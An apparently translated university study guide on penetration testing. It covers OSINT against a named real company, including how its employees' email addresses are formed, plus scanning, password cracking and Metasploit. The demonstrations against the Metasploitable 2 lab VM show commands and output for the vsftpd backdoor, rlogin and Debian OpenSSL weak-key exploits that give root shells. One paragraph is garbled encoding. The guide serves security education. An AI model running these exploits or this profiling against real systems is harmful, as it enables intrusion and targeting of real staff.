INTRODUCTION


This study guide contains materials that will allow students to master the theoretical foundations of penetration testing and to practice in laboratory work devoted to Internet reconnaissance and vulnerability exploitation, as part of the course "Technologies for Certification of Information Security Tools".

Understanding the basics of vulnerability exploitation lets students appreciate the importance and necessity of certification, which reduces the risk that undeclared capabilities are present.

Structurally, the guide consists of six theoretical sections, which describe the various stages of penetration testing, and two laboratory works.

In addition, a list of recommended sources is provided, which includes literature and other sources recommended by the authors for a deeper study and understanding of this subject.
1 THEORETICAL FOUNDATIONS OF PENETRATION TESTING


The best way to stop a criminal is to think like a criminal. Installing burglar alarms and fences is not enough to ensure security against a break-in. To stop a burglar effectively, you have to predict his every move. In exactly the same way, the best way to prevent the compromise of an organization's infrastructure is to think like an attacker.

One of the popular ways for companies to assess how well they are protected against attacks is to engage external firms and security researchers who specialize in testing the security of computer systems.

A security researcher is an "ethical hacker" who is hired by an organization to try to compromise the company's network in order to assess its security. Before any testing, the customer and the security researcher sign a contract that spells out the restrictions. The restrictions usually define what may and may not be done during the penetration test. For example, a security researcher is, as a rule, not allowed to carry out denial-of-service attacks against the target network or to plant viruses. Nevertheless, the scope of the testing performed by the security researcher varies depending on the needs of the organization.

There are several penetration testing methods:

1. The "black box" method. In this kind of testing the researcher knows nothing about the company's network. For example, in an external "black box" test the researcher may be given only the address of a website, and the task is to break in as if he were a real attacker.

2. The "white box" method. In "white box" testing the researcher has full knowledge of the internal organization of the network. Before the tests are carried out, the researcher may be given network diagrams or a list of the operating systems and applications in use. Although such a situation is unlikely in real life, the method is the most effective and accurate, because it represents the worst-case scenario, in which the attacker has full knowledge of the network.

3. The "gray box" method. In "gray box" testing the researcher imitates the actions of an employee of the organization, that is, he receives an account for access to the internal network and standard access rights. This method makes it possible to assess internal threats originating from the company's employees.
Security researchers look for vulnerabilities and security threats.

A vulnerability is a weakness or flaw that can be used to deliberately violate the system's integrity and cause it to malfunction.

A threat is a potential violation of security that can cause damage, such as disclosure of confidential data, modification of data, destruction of data or denial of service.

To protect assets from threats in any infrastructure, their security must be ensured. Threats can relate to confidentiality, integrity or availability.

1. A threat to confidentiality means that there is a risk of information being disclosed to someone who is not authorized to access it. It occurs when access is gained to some restricted information that is stored in a computing system or transmitted from one system to another.

2. A threat to integrity (unauthorized modification of data) is the risk of data being changed by unauthorized users.

3. A threat to availability is the creation of conditions in which access to a service or to information is either blocked or possible only within a time that does not allow particular business goals to be met.

The infrastructure under study is considered protected when the possibility of leakage, theft or modification of the information being processed remains at an acceptable level. The acceptable level is determined by a cost-risk analysis, in which the cost of protecting the data is compared with the risk of losing or compromising the data. The goal of penetration testing is not to reduce risk to zero but to reduce it to the acceptable level set by management. In the end, some residual risk remains, which may be accepted.

The main goal of penetration testing is the report on the test results, which is meant to draw management's attention to the security policy that exists in the organization.

A security policy is a document that sets out the best methods of ensuring security within the organization, as established by the persons responsible for protecting the organization's assets. Vulnerabilities in a security system exist not because of the technology or configuration deployed, but because the security policy does not address the problem or because users do not follow the policy.

In penetration testing it is important to distinguish between an existing vulnerability and a zero-day vulnerability. A zero-day vulnerability is an undocumented new vulnerability against which no protective mechanisms have yet been developed. Zero-day vulnerabilities are a serious danger, because preventing their reproduction is often a difficult task. The best practice for protection against attacks that use zero-day vulnerabilities is to deploy heuristic analysis or signature-based detection.

Typical factors that give rise to security threats and to the need for penetration testing:

1. Wireless local area networks. Wireless networks are popular in many organizations thanks to their ease of use and flexibility. However, wireless networks are susceptible to eavesdropping.

2. Complex network topology. In the past, a single network operating system was enough. Today administrators, in addition to their main tasks of administering a large number of security tools and network devices, keep several operating systems running. Meanwhile, technologies grow more complex every year. A static website hosted on a web server is no longer enough. Companies now need several firewalls, encryption tools, load-balanced clusters, back-end databases and dynamic front-end websites. This growth in the complexity of technologies and network topologies makes it hard for administrators to provide proper protection against security threats and to install the relevant patches on time.

3. Frequency of software updates. Along with the growth in complexity, the number of software fixes (patches) that have to be installed is increasing. It is hard for administrators to keep track of all the necessary fixes so as to install them on time and secure their systems. As a result, systems remain unpatched and therefore vulnerable to attack.

4. Marketing requirements. Financial institutions, online shops and data centers are a short list of the types of companies that sell their secure network to potential customers. Penetration testing is needed to verify the security of such companies' infrastructures. Sometimes the test results are also provided to potential customers.

5. Availability of hacking tools. There are many software tools for attacking networks, most of which are free and publicly available. Worse still, many of these tools do not require a detailed understanding of how networks and computers work, which makes attacks easier for anyone who has basic computer skills.

6. Open-source software. Although the availability of source code is an advantage for many, it also simplifies the process of discovering vulnerabilities. Since hackers can also read the source code, they can quickly find vulnerabilities, for example buffer-overflow vulnerabilities that make it possible to disrupt a program or that lead to the execution of arbitrary code.

7. Uncontrolled remote users. More and more companies allow employees to work remotely. Unfortunately, security administrators cannot control these remote systems. Attackers who know about these remote connections can use them to their own advantage. Companies can hire security researchers to perform "gray box" testing, in which the actions of remote users are imitated and an attempt is made to gain access and escalate privileges on internal systems.

Stages of penetration testing:

The first stage is reconnaissance. At the reconnaissance stage the researcher tries to collect as much information as possible about the chosen target. Reconnaissance can be active or passive. In active reconnaissance the security researcher uses tools such as nslookup, dig or SamSpade to examine the target network, for example to determine the range of IP addresses. In a passive reconnaissance attack the security researcher uses publicly available information to learn about the technologies used in the organization.

The second stage is scanning. Here the security researcher studies the network topology by scanning for open ports with tools such as Nmap. The goal is to identify the services running on the target hosts. At this stage the security researcher also determines the type of operating system. The scanning stage also includes checking for vulnerabilities. Testing for vulnerabilities precedes the discovery of methods for gaining access to the target host.

Gaining access: after checking the target network for vulnerabilities, the security researcher tries to exploit these vulnerabilities and, if successful, takes steps to maintain access to the target host.

Maintaining access is achieved by installing backdoors that allow the security researcher to reconnect to the system.

The last stage of testing is the removal of evidence (traces of the intrusion). The researchers check whether the log files that hold traces of their activity on the network can be erased.
2 INFORMATION GATHERING


The first stage of breaking into any information system begins with collecting as much information about the target as possible. It is almost never possible to collect all the information from one single source. The data has to be gathered from many different places in order to obtain, in the end, a complete picture of the organization's information system.

At this stage the weak points of the network are identified, through which the system will later be penetrated. With the right approach it is possible not only to identify potentially vulnerable points but also to outline possible attack vectors against the designated target.

Any available information about the enterprise can be put to use in carrying out a successful attack.

Usually, with only the name of the organization in hand, one starts by collecting the following data:

• domains;

• network addresses or network blocks;

• location;

• contact information;

• news about mergers or acquisitions;

• job vacancies;

• links to web services associated with the organization;

• various documents;

• the structure of the organization.

This is only an approximate list, and it can be continued for quite a while. For example, by looking through a company's job vacancies one can learn which information systems are used inside the organization. And by analyzing the HTML code of the home page one can find links to internal resources. The direction of the attack, as well as its type and success, depends on how the information gathering is carried out. Most of the information-gathering process requires no special knowledge; the ability to use search engines is enough. They often index even information that someone tried to hide from the outside world.

2.1 Using Google for information gathering

A hacker or an auditor can use not only Google for information gathering but also Yahoo or any other search service. Search operators can be used to speed up and simplify the process of searching for and collecting information. Without them, finding the required information is not just difficult but practically impossible.
For example, for the query royalmail Google returns about 61 800 000 results. For the query site:royalmail.com it returns 261 000, and after the refinement site:royalmail.com filetype:doc only 5.

In this way, out of half a billion search results we have filtered only what was of interest to us.

Operators:

• the site operator restricts the results of a query to information from a single site (usage example: site:nic.ru);

• the filetype operator is used to search for files of a particular type (usage example: filetype:doc);

• the inurl operator looks for the given text only in the URL of a site;

• the intitle operator looks for information based on the title of the document.

2.2 Searching for information about people

If you have found a list of the company's employees, it is useful to collect as much information about them as possible. It happens quite often that breaking into a resource that seemingly has nothing to do with the organization we are trying to break into leads to its compromise. This is possible if employees use the same passwords to access different systems.

The best place to look for information, just as for our Western colleagues, is still social networks. Because a huge number of people use them, they become a bottomless source of information. They make it possible to trace everything: career, lifestyle, interests and much more. Using the geotag data of photographs one can see what is going on behind the closed doors of the organization.

2.3 Searching archived data

To find information that an organization previously published on the Internet and then removed (because of a mistake or because the information became outdated), one can use the archive.org service. This is the so-called Internet Archive, which collects copies of web pages, graphic materials, video and audio recordings and software. The archive provides long-term archiving of the collected material and free access to its databases for the general public.
2.4 Demonstration of information gathering

Let us collect information from open sources about the company JSC NPO Echelon. Using Google, we find the organization's website (Figure 1).


Figure 1 - Searching for information about the company NPO Echelon


To determine the mail accounts of the organization's employees, the information on the website has to be analyzed. Having analyzed the "Contacts" section, we determine the organization's common mail domain, "@npo-echelon.ru" (Figure 2).


Figure 2 - Searching for information about the company's employees


Analyzing the content of the site, we find an example of a personal e-mail address, "a.markov@bmstu.ru", in the "Publications" section (Figure 3).
Figure 3 - Details of employees' e-mail addresses


We assume that a mail address on the "@npo-echelon.ru" domain is formed in the same way. To check this assumption, we compose a query in the search engine (Figure 4).


Figure 4 - Checking a work e-mail address

To search the organization's domain for files that contain "AK-BC" in the title and have the PDF extension, the query «site:"npo-echelon" filetype:pdf intitle:AK-BC» has to be composed (Figure 5).

Figure 5 - Searching files on the organization's domain
To obtain the list of directories closed to indexing by search engines, the "robots.txt" file has to be opened. To get it, enter https://npo-echelon.ru/robots.txt in the address bar (Figure 6).

Figure 6 - List of directories closed to indexing by search engines
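The same robots.txt check can be run by a site owner against their own file to see which paths it discloses to any reader. The following is an added example, not part of the original guide; the sample file contents and the `SENSITIVE_HINTS` keyword list are constructed assumptions.

```python
"""Audit a robots.txt file for the paths it discloses to anyone who reads it."""

# Constructed sample; not the real file of any site.
SAMPLE_ROBOTS = """\
User-agent: ExampleBot
Disallow: /

User-agent: *
Disallow: /admin/      # back office
Disallow: /upload/
Disallow: /backup/old/
Disallow:
Allow: /upload/public/
Crawl-delay: 10
Sitemap: https://example.com/sitemap.xml
"""

# Assumption: substrings suggesting a path that needs real access control.
SENSITIVE_HINTS = ("admin", "backup", "private", "config", "login")


def parse_robots(text):
    """Return {user_agent: {"disallow": [...], "allow": [...]}}.

    Consecutive User-agent lines share one group of rules; a User-agent line
    that follows a rule line starts a new group.
    """
    groups = {}
    current_agents = []
    last_was_agent = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not last_was_agent:
                current_agents = []
            current_agents.append(value)
            groups.setdefault(value, {"disallow": [], "allow": []})
            last_was_agent = True
            continue
        last_was_agent = False
        if field in ("disallow", "allow") and value:   # empty Disallow = allow all
            for agent in current_agents:
                groups[agent][field].append(value)
    return groups


def disclosed_paths(groups):
    """All distinct Disallow paths other than a blanket '/'."""
    paths = set()
    for rules in groups.values():
        paths.update(p for p in rules["disallow"] if p != "/")
    return sorted(paths)


def flag_sensitive(paths, hints=SENSITIVE_HINTS):
    """Paths whose name hints at content that robots.txt alone does not protect."""
    return [p for p in paths if any(h in p.lower() for h in hints)]


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS)
    found = disclosed_paths(parsed)
    print("Disclosed paths:", found)
    print("Review access control for:", flag_sensitive(found))
```

A Disallow line only asks crawlers not to index a path; anything flagged here still needs authentication on the server side.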

To analyze the site for previous versions, the "waybackmachine.org" service has to be used (Figure 7).



Figure 7 - Analysis of previous versions of the site

To obtain information about the domain, the "whois" utility has to be run in the console of a unix system with the IP address and with the domain name of the site. The IP address is determined by running the "ping" command (Figures 8-9).
Figure 8 - Running the "whois" utility with the IP address
Figure 9 - Running the "whois" utility with the domain name of the site

For an automated search for the organization's subdomains, we install the Sublist3r utility according to the instructions (https://github.com/aboul3la/Sublist3r) and run it with the domain specified (Figure 10).
Figure 10 - Running the Sublist3r utility

Thus, using information from open sources only, we managed to establish the name of the company's mail domain, the names of the company's subdomains, and the way in which employees' work e-mail addresses are formed.
3 SCANNING


Having collected information about the target organization from open sources at the previous stage, the security researcher moves on to the second stage: obtaining information directly from the internal network services of the target organization. Whereas at the previous stage the security researcher's actions were practically impossible to detect with any of the known tools used for attack prevention, at the scanning stage, when services are contacted directly, the activity is fairly easy to notice. If the task is to audit the information system in such a way that the IT department staff do not learn about it, the question arises of hiding the IP address in use by means of various proxy servers or specialized software.

3.1 Port scanning

Port scanning is the very first stage of active reconnaissance and perhaps one of the most important. This method makes it possible to identify the active machines running in the target organization's network, as well as the software installed on them, the network services that are running and, in some cases, the version of the operating system. TCP port scanning is based on the "three-way handshake". The scanner sends a SYN packet to the port being scanned and, if the port is open, receives an ACK packet in reply, and if the port is closed, an RST packet. UDP port scanning has its own peculiarity, because the UDP protocol, unlike TCP, does not guarantee reliable delivery of information and does not use "handshakes". If the scan finds that a port is closed, the scanner receives a "port unreachable" message back. The absence of such a message, in turn, lets the scanner decide that the port is open. But there is one problem here: if there is a firewall in front of the server that blocks the requests coming from the scanner, the scanner will not receive the message about the failed connection and will wrongly decide that the port is open.
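The remark above that direct contact with services during scanning is fairly easy to notice can be shown from the defender's side. The following added example (not from the original guide) flags sources that probe many distinct TCP ports within a short window and mostly get RST or no reply; the log format, addresses and thresholds are constructed assumptions.

```python
"""Flag likely TCP port scans in connection-attempt records."""
from collections import defaultdict

WINDOW_SECONDS = 60       # assumption: sliding window length
MIN_DISTINCT_PORTS = 10   # assumption: distinct (host, port) targets to alert on
MIN_CLOSED_RATIO = 0.7    # assumption: share of probes that found no open port


def build_sample_log():
    """Constructed records: 'epoch_seconds src_ip dst_ip dst_port reply'.

    reply is the target's answer to the initial SYN, in the text's terms:
    ACK = open port (the SYN/ACK reply), RST = closed, NONE = dropped by a firewall.
    """
    lines = []
    for i, port in enumerate(range(20, 35)):          # scanner: 15 ports in 3 s
        reply = "ACK" if port in (22, 25) else "RST"
        lines.append(f"{1000 + i // 5} 198.51.100.7 192.0.2.10 {port} {reply}")
    for i in range(20):                               # busy client, one open port
        lines.append(f"{1000 + i * 10} 203.0.113.5 192.0.2.10 443 ACK")
    for port in (8080, 8081, 8082):                   # a few stray closed ports
        lines.append(f"1005 203.0.113.9 192.0.2.10 {port} RST")
    return "\n".join(lines)


def parse_log(text):
    """Parse records into time-ordered (ts, src, dst, port, reply) tuples."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                                  # skip malformed lines
        ts, src, dst, port, reply = parts
        events.append((int(ts), src, dst, int(port), reply))
    return sorted(events)


def detect_scans(events, window=WINDOW_SECONDS,
                 min_ports=MIN_DISTINCT_PORTS, min_closed=MIN_CLOSED_RATIO):
    """Return {src_ip: summary} for sources whose probes look like a scan."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        start, best = 0, None
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window
                start += 1
            chunk = evs[start:end + 1]
            targets = {(e[2], e[3]) for e in chunk}
            closed = sum(1 for e in chunk if e[4] != "ACK")
            if len(targets) >= min_ports and closed / len(chunk) >= min_closed:
                if best is None or len(targets) > best["distinct_ports"]:
                    best = {
                        "distinct_ports": len(targets),
                        "open_ports": sorted({e[3] for e in chunk if e[4] == "ACK"}),
                        "first_seen": chunk[0][0],
                    }
        if best:
            findings[src] = best
    return findings


if __name__ == "__main__":
    for src, info in detect_scans(parse_log(build_sample_log())).items():
        print(src, info)
```

The `open_ports` field tells the defender which services the scanning source has learned about and which therefore deserve a first look.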

3.2 Identifying active hosts

Identifying active hosts helps reduce the time needed to carry out the audit. By identifying the active hosts and concentrating only on them, the security researcher can save a great deal of time and reduce the amount of work. The ping command can be used to identify active hosts.

Ping is a standard utility that is part of every OS. However, this method has one drawback: very often ICMP, on which ping is based, is blocked at the firewall level. In that case the host to which the requests are sent will not answer them.

IIocKOJibKy ping oSnaaaeT aocTaTOHHO orpaHHneHHOH 
(l)yHKHHOHajibHOCTbK), Bflo6aBOK Hcnojib3yeTca yranHTa hping3, KOTopaa 
pa6oTaeT He tojibko c ICMP, ho h c TCP-npOTomnoM, cjieaoBaTejibHO, OHa 
MoaceT OTnpaBaaTb 3anpocbi Ha jiio6oh nopT, nojiynaTb otbctbi h o6pa6aTbiBaTb 

HX. 


3.3 Obtaining information from a DNS server

Information that can be obtained from a DNS server makes it possible to compile a list of the public external, and sometimes internal, servers used by the target organization. There are several ways to interact with a DNS server, for example the cross-platform utility nslookup.

Record types used by the DNS service:

• A (Address) - maps a domain name to an IP address;

• SOA (Start of Authority) - shows which DNS servers are responsible for the reference information about the zone;

• CNAME (Canonical Name) - an additional name for the domain;

• MX (Mail Exchange) - defines which mail servers serve the zone;

• SRV (Service) - shows which services serve the zone (for example, Active Directory servers);

• PTR (Pointer) - maps an IP address to a domain name;

• NS (Name Server) - shows which DNS servers serve the zone.

A great deal of useful information can be obtained from these records.

4 VULNERABILITY DISCOVERY AND EXPLOITATION


So, a server that can be accessed has been found. Unauthorized connections usually rely on vulnerabilities in the installed software. Vulnerabilities can be searched for manually, using the information gathered and vulnerability databases. However, this is a very long and laborious process. Alternatively, vulnerability scanners can be used. The most popular of them are Nessus, OpenVAS, Retina and Nexpose. They not only find open vulnerabilities in installed software and operating systems, but also detect outdated encryption protocols, infected computers and much more. OpenVAS is included in Kali Linux.

Kali Linux is a leading Linux distribution for penetration testing and security auditing. Kali includes more than 600 tools aimed at various information security tasks, such as penetration testing, information gathering, forensics and reverse engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading company in information security training. The widespread Debian distribution was chosen as the basis for Kali Linux, which makes it easy to use for a wide range of users of Ubuntu, Knoppix and other Debian-based distributions.

All actions carried out at this stage of a penetration test can be noticed by the administrators of the target system. If that happens, they will almost certainly try to prevent any further actions.

The Metasploit Framework software platform was created for developing, testing and using exploits.

An exploit is a special program that uses known vulnerabilities in software to carry out an attack in order to gain control over a system or to put it out of action (denial of service). Exploits can be remote, working over a computer network, or local, launched directly on the system itself. In Metasploit, exploits are divided into active and passive. Active exploits start exploiting a particular software vulnerability immediately after launch and finish on success or failure. Passive exploits wait for a remote host to connect and only then start their work. For example, an exploit can be started and its client part sent to the victim by e-mail. Once the recipient opens the attachment, the client part connects to the previously started exploit, which then begins the attack. All available exploits can be listed with the show exploits command; given their huge number, however, this is not always convenient.

Metasploit is a universal tool for security auditing. The framework is continuously maintained and updated. Most work with the free version is done through the command-line interface, msfconsole. There is also a graphical interface, Armitage.

Metasploit consists of a core that ties together the following pluggable components:

1. Interfaces: console and graphical;

2. Modules:

- exploits (make it possible to exploit a vulnerability that has been found);

- payloads (a program that runs after the exploit succeeds and performs a defined function, for example creating a user, opening a port, etc.);

- auxiliary modules (port scanner, password brute-forcing, traffic analysis, etc.);

- encoders (allow malicious code to be hidden from protection systems by transforming it repeatedly), etc.

3. Extensions: significantly extend the functionality of Metasploit.

5 PASSWORD ATTACKS ON VARIOUS SERVICES


By default, a login and password pair is used for authentication in all systems, whether it is a web application, an operating system or a database.

There are two main methods of attacking passwords. In reality there are many ways to crack a password, but they are all essentially modifications of either exhaustive search or dictionary search.

1. Brute force. The name of the method speaks for itself: the attacker simply tries passwords one after another. For example, first all numbers from 0 to 9 are tried, then from 10 to 99, from 100 to 999, and so on. Guessing a password this way by hand is not feasible; special software is used for it, which we will look at a little later.

2. Dictionary attacks. The essence of the method is that the attacker does not pick passwords at random but takes words from a previously prepared password file. Naturally, as in the previous case, the search is not done by hand.

A password file can be found on the Internet. But because users very often build their passwords from the name of their profession, their date of birth or the name of their organization, a self-made password list will in some cases be far better than those found on the Internet.

Of course, creating a list of even 1000 passwords by hand is a rather difficult task. There are ways to automate this process, for example the Crunch utility, which is included in Kali Linux. It can generate word lists based on rules specified by the user.

For example, knowing the company's security policy at least as far as passwords are concerned, one can create a list of strings containing, say, nine characters, one capital letter and one digit.

The second way to create one's own personalized password list is to use words and phrases from the organization's website. A tool called cewl, which is also included in Kali Linux, can be used for this purpose.

Passwords are rarely stored in clear text; in the overwhelming majority of cases they are recorded as hashes. A hash is the result of a function that transforms input data into a string of fixed length. Password hashes are stored in files and databases. A password cannot be obtained from a hash; only by exhaustive search can a password with the same hash be found. Different passwords cannot have identical hashes (in modern algorithms). For the search, the type of algorithm that produced the hash must first be established. All of this is done with special software, for example John the Ripper. Rainbow tables can also be used for these purposes.

Rainbow tables are a precomputed data set containing the hash-function values for a multitude of combinations of letters and digits. If the hash value is known, the corresponding password can be found in the table very quickly.

Rainbow tables are built from chains of possible passwords. Each chain starts with a random password, to which a hash function and a reduction function are then applied. The reduction function converts the output of the hash function into some possible password. The intermediate passwords of a chain are not stored; only the first and last elements of each chain are entered into the table.

A table works only for the hash function for which it was created.
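The chain construction described above, as an added example that is not part of the original manual, over a deliberately tiny password space: four-digit PINs hashed with unsalted MD5. The reduction function, chain length and function names are assumptions chosen for illustration; the salted call at the end shows why a per-user salt makes a precomputed table useless.

```python
import hashlib

SPACE = 10_000   # password space of the toy: PINs "0000".."9999"
CHAIN_LEN = 50   # passwords covered by one stored (start, end) pair


def h(password, salt=""):
    """The hash function the table is built for (unsalted by default)."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def reduce_(digest, step):
    """Reduction: map a digest back into the password space.

    Making it depend on the step number is what distinguishes a rainbow
    table from a plain hash chain: chains that collide at different
    positions do not merge.
    """
    return f"{(int(digest, 16) + step) % SPACE:04d}"


def walk(password, steps, first_step=0):
    """Apply hash + reduction `steps` times, starting at position first_step."""
    for step in range(first_step, first_step + steps):
        password = reduce_(h(password), step)
    return password


def build_table(starts):
    """Store only endpoint -> start; intermediate passwords are discarded."""
    return {walk(start, CHAIN_LEN): start for start in starts}


def lookup(table, target_digest):
    """Find a password whose hash equals target_digest, or None."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        # Assume the target sits at position `pos` of some chain and
        # compute the endpoint that chain would then have.
        end = walk(reduce_(target_digest, pos), CHAIN_LEN - pos - 1, pos + 1)
        if end not in table:
            continue
        # Endpoint matched: rebuild that chain from its stored start.
        candidate = table[end]
        for step in range(CHAIN_LEN):
            if h(candidate) == target_digest:
                return candidate
            candidate = reduce_(h(candidate), step)
        # False alarm (chains merged); keep trying other positions.
    return None


if __name__ == "__main__":
    table = build_table(["0000"])          # one stored pair
    pin = walk("0000", 10)                 # a PIN inside that chain
    print("unsalted:", lookup(table, h(pin)))
    print("salted:  ", lookup(table, h(pin, salt="x9")))
```

The table holds one pair yet recovers any of the 50 PINs on its chain; the salted digest is a value of a different function, so the same table finds nothing.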





6 THE METASPLOITABLE 2 EXPLOIT TESTING ENVIRONMENT

The main purpose of Metasploitable 2 is to help information security specialists assess their skills and legally try out various tools; to help developers better understand how to write secure code; and to give students and teachers the opportunity to learn more about security in a controlled environment. Metasploitable 2 makes it possible to practise exploiting the most popular vulnerabilities.

The Metasploitable virtual machine is an intentionally vulnerable version of an Ubuntu Linux virtual machine. In its preinstalled operating system all ports are open in advance and the best-known vulnerabilities are present, some of which are encountered in real life on production systems.

7 DEMONSTRATION OF VULNERABILITY EXPLOITATION


The following shows ways of exploiting vulnerabilities, using two services as examples. Exploitation can be carried out in manual and automated modes.

To attack the ftp service, version vsftpd 2.3.4, search for existing exploits with the searchsploit utility and a keyword (Figure 11). Online databases such as exploit-db may also be used for the search.

The result of the search is a reference to a ready-made exploit, if one exists. For automated exploitation, start "Metasploit" by typing msfconsole in the "Kali Linux" terminal, then locate the exploit with the search command and select it with the use command (Figure 12).

root@bad:~# searchsploit vsftpd 2.3.4
 Exploit Title                                          | Path
                                                        | (/usr/share/exploitdb/platforms/)
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)  | unix/remote/17491.rb
root@bad:~#

Figure 11 - Searching for exploits with the searchsploit utility

A database appears to be already configured, skipping initialization
# cowsay++
< metasploit >

       =[ metasploit v4.16.7-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 299 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search vsftpd 2.3.4

Matching Modules

   Name                                  Disclosure Date  Rank       Description
   auxiliary/gather/teamtalk_creds                        normal     TeamTalk Gather Credentials
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

msf >

Figure 12 - Exploit search results

After selecting the exploit, check the options available for configuration with the options command, then set the required ones with the set command. Once configuration is complete, the exploit is launched with the run command (Figure 13).

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   RHOST  10.211.50.8      yes       The target address
   RPORT  21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description

Exploit target:

   Id  Name
   0   Automatic

msf exploit(vsftpd_234_backdoor) > set RHOST 10.211.55.8
RHOST => 10.211.55.8
msf exploit(vsftpd_234_backdoor) > run
10.211.55.8:21 - Banner: 220 (vsFTPd 2.3.4)
10.211.55.8:21 - USER: 331 Please specify the password.
10.211.55.8:21 - Backdoor service has been spawned, handling...
10.211.55.8:21 - UID: uid=0(root) gid=0(root)
Found shell.
Command shell session 1 opened (10.211.55.7:38245 -> 10.211.55.8:6200) at 2017-10-02 12:09:24 +0300
wh
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
id
uid=0(root) gid=0(root)

Figure 13 - Checking, configuring and launching the exploit

To verify that the obtained session works correctly, enter the uname command with the -a parameter.

Misconfigured services can be exploited manually. To exploit the misconfigured set of r-services listening on ports 512, 513 and 514, use the standard tools: in the "Kali Linux" console, type the rlogin command followed by the address of the "attacked" machine.


root@bad:~# rlogin 10.211.55.8
Last login: Mon Oct 2 08:31:24 EDT 2017 from kali-debian.shared on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#

Figure 14 - Verifying the obtained session

To verify that the obtained session works correctly, enter the uname command with the -a parameter.

Automated exploitation of a vulnerability is also possible with exploits that are not included in "Metasploit". To attack the vulnerable version of the "OpenSSL" module used by the ssh service, download the archive of rsa keys from https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 and unpack it. Then download the utility from https://www.exploit-db.com/exploits/5720/ and run it. Its parameters are the path to the directory with the rsa keys, the address of the vulnerable machine, the user, and the port on which the ssh service is listening (Figure 15).


root 6543 0.0 0.3 40264 3160 pts/0 R+ 13:54 0:00 ps -uxa
root@bad:~/Desktop# clear
root@bad:~# python 5720.py

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
    <host>: The victim host
    <user>: The user of the victim host
    [port]: The SSH port of the victim host (default 22)
    [threads]: Number of threads (default 4) Too big numer is bad
root@bad:~# python 5720.py /root/Desktop/5622/rsa/2048 10.211.55.8 root 22

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 185 keys | Remaining 32583 keys | Aprox. Speed 37/sec
Tested 366 keys | Remaining 32402 keys | Aprox. Speed 36/sec
Tested 549 keys | Remaining 32219 keys | Aprox. Speed 36/sec
Tested 731 keys | Remaining 32037 keys | Aprox. Speed 36/sec
Tested 913 keys | Remaining 31855 keys | Aprox. Speed 36/sec
Tested 1096 keys | Remaining 31672 keys | Aprox. Speed 36/sec
Tested 1278 keys | Remaining 31490 keys | Aprox. Speed 36/sec
Tested 1463 keys | Remaining 31305 keys | Aprox. Speed 37/sec
Tested 1644 keys | Remaining 31124 keys | Aprox. Speed 36/sec
Tested 1827 keys | Remaining 30941 keys | Aprox. Speed 36/sec
Tested 2011 keys | Remaining 30757 keys | Aprox. Speed 36/sec
Tested 2192 keys | Remaining 30576 keys | Aprox. Speed 36/sec
Tested 2367 keys | Remaining 30401 keys | Aprox. Speed 35/sec
Tested 2538 keys | Remaining 30230 keys | Aprox. Speed 34/sec
Tested 2707 keys | Remaining 30061 keys | Aprox. Speed 33/sec
Tested 2879 keys | Remaining 29889 keys | Aprox. Speed 34/sec

Figure 15 - Finding the rsa key by exploiting the OpenSSL library vulnerability

The result of running the program is a matching rsa key. To gain access to the vulnerable machine, run the following command: "ssh -l[user] -p[port] -i [path to the rsa key] [ip address]" (Figure 16).



Tested 26448 keys | Remaining 6320 keys | Aprox. Speed 35/sec
Tested 26617 keys | Remaining 6151 keys | Aprox. Speed 33/sec
Tested 26795 keys | Remaining 5973 keys | Aprox. Speed 35/sec
Tested 26970 keys | Remaining 5798 keys | Aprox. Speed 35/sec
Tested 27143 keys | Remaining 5625 keys | Aprox. Speed 34/sec
Tested 27321 keys | Remaining 5447 keys | Aprox. Speed 35/sec
Tested 27499 keys | Remaining 5269 keys | Aprox. Speed 35/sec

Key Found in file: 57c3115d77c56390332dc5c49978627a-5429
Execute: ssh -lroot -p22 -i /root/Desktop/5622/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 10.211.55.8
Tested 27506 keys | Remaining 5262 keys | Aprox. Speed 1/sec
root@bad:~# ssh -lroot -p22 -i /root/Desktop/5622/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 10.211.55.8
Last login: Mon Oct 2 02:23:48 2017 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

